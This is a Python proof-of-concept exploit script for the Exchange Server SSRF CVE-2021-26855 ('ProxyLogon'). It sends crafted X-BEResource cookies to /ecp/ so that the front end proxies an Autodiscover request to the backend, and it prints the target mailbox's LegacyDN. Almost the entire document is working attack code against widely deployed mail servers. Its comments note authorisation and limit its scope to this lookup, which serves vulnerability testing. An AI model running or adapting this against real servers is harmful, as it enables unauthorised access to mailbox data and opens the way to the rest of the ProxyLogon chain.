# PoC: Exchange Server SSRF to the authenticated backend service (CVE-2021-26855, "ProxyLogon")
# By Alex Hernandez aka alt3kx (c) Mar 2021
#
# Reference: https://www.praetorian.com/blog/reproducing-proxylogon-exploit/
# Usage:     python CVE-2021-26855_poc.py <target> <email>
# Example:   python CVE-2021-26855_poc.py mail.exchange.com [email protected]
#
# Scope: this script only checks that the SSRF is reachable.  It abuses the
# X-BEResource cookie on an /ecp/ request to have the front end proxy an
# Autodiscover query to the backend, and prints the response when it contains
# the mailbox's LegacyDN.  Nothing beyond that lookup is attempted.
# Run it only against systems you are authorised to test.
import os
import random
import string
import sys
from xml.sax.saxutils import escape

import requests
from urllib3.exceptions import InsecureRequestWarning
# Optional: route both requests through an intercepting proxy (e.g. Burp on
# 127.0.0.1:8080) by uncommenting this line and the proxies= arguments below.
#proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
    """Return a string of ``size`` characters picked at random from ``chars``.

    The script uses it to build a throw-away filename for the /ecp/ request
    (presumably so each run hits a distinct path).  ``random`` rather than
    ``secrets`` is acceptable here: the value is not a credential or token,
    it only needs to vary between runs.
    """
    picks = [random.choice(chars) for _ in range(size)]
    return "".join(picks)
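# Seconds to wait per HTTP request.  ``requests`` has no default timeout, so
# without one a silently dropped connection hangs the check forever.
REQUEST_TIMEOUT = 15

# Browser-like User-Agent sent with both requests.
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"

# Autodiscover request body; ``%s`` receives the XML-escaped mailbox address.
AUTODISCOVER_TEMPLATE = """<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
</Request>
</Autodiscover>
"""


def usage(prog):
    """Clear the terminal and print the banner plus usage text for ``prog``."""
    os.system('clear')
    print("PoC Exploit Exchange Server SSRF Authenticated Backend Service (CVE-2021-26855)")
    print("By Alex Hernandez aka alt3kx (c) Mar 2021")
    print("Reference: https://www.praetorian.com/blog/reproducing-proxylogon-exploit/\n")
    print("Usage: python %s <target> <email>" % prog)
    print("Example: python %s mail.exchange.com [email protected]" % prog)


def _request(method, url, **kwargs):
    """Issue one HTTP request and return the response.

    Exits with a ``[-]`` message and status 1 on any transport error
    (DNS failure, refused connection, timeout), instead of dumping a traceback.

    TLS verification is deliberately disabled (``verify=False``): Exchange front
    ends commonly present self-signed or internal-CA certificates and the check
    must still reach them.  The trade-off is that an on-path attacker could
    impersonate the target; acceptable for a lab check, but keep it in mind.
    """
    try:
        return requests.request(
            method, url,
            timeout=REQUEST_TIMEOUT,
            verify=False,
            # proxies=proxies,
            **kwargs
        )
    except requests.exceptions.RequestException as exc:
        print("[-] Request to %s failed: %s" % (url, exc))
        sys.exit(1)


def main(argv=None):
    """Check whether ``target`` exposes the CVE-2021-26855 SSRF.

    Two requests go to ``https://<target>/ecp/<random>.js`` carrying a crafted
    ``X-BEResource`` cookie:

    1. a GET naming ``localhost`` as the backend, used only to read the
       front end's own name from the ``X-FEServer`` response header;
    2. a POST naming ``<FEServer>/autodiscover/autodiscover.xml`` as the
       backend, with an Autodiscover request for ``email`` as the body.

    A 200 response whose body contains ``<LegacyDN>`` is printed as evidence
    that the front end proxied the request to the backend.  Nothing beyond
    this lookup is attempted.

    Args:
        argv: command-line arguments (defaults to ``sys.argv``); needs
            ``<target> <email>``.

    Exits with status 1 on usage error, transport error, non-200 response or
    missing LegacyDN (the original always exited 0, which made the result
    invisible to a calling script).
    """
    if argv is None:
        argv = sys.argv
    # Both argv[1] and argv[2] are read below, so fewer than three entries is a
    # usage error.  The original tested ``< 2`` and then raised IndexError
    # when only the target was supplied.
    if len(argv) < 3:
        usage(os.path.basename(argv[0]) if argv else "CVE-2021-26855_poc.py")
        sys.exit(1)

    requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
    target = argv[1]
    email = argv[2]
    # Throw-away filename under /ecp/, fresh for every run.
    random_name = id_generator(3) + ".js"
    # ``email`` is operator input: escape it so an address containing '&' or
    # '<' cannot produce malformed XML (identical output for ordinary addresses).
    autoDiscoverBody = AUTODISCOVER_TEMPLATE % escape(email)
    ecp_url = "https://%s/ecp/%s" % (target, random_name)

    print("[+] \033[1mAttacking Exchange Server:\033[00m " + target)

    # Step 1: learn the front-end server name.  The X-BEResource cookie tells
    # the front end which backend resource to proxy to; the value after '~' is
    # carried verbatim from the referenced write-up and is not varied here.
    # If the response lacks X-CalculatedBETarget / X-FEServer, fall back to the
    # placeholder "EXCHANGE" as the original did, but say so.
    FQDN = "EXCHANGE"
    ct = _request("GET", ecp_url, headers={
        "Cookie": "X-BEResource=localhost~1942062522",
        "User-Agent": user_agent,
    })
    if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers:
        FQDN = ct.headers["X-FEServer"]
    else:
        print("[!] X-FEServer header not returned; falling back to backend name 'EXCHANGE'")

    # Step 2: have the front end proxy an Autodiscover request to the backend.
    ct = _request("POST", ecp_url, headers={
        "Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN,
        "Content-Type": "text/xml",
        "User-Agent": user_agent,
    }, data=autoDiscoverBody)
    if ct.status_code != 200:
        print("[-] Autodiscover Error! (HTTP %d)" % ct.status_code)
        sys.exit(1)
    if "<LegacyDN>" not in ct.text:
        print("[-] Can not get LegacyDN! from " + email)
        sys.exit(1)
    print(ct.text)


if __name__ == "__main__":
    main()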